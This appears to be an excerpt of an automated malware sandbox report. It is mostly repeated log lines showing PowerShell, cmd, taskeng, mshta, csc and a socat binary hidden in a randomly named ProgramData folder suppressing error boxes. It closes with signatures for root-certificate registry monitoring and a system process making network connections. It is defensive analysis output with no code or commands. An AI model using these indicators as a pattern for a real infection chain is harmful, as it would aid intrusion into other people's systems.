Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOX
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
System process connects to network (likely due to code injection or exploit)Show sources
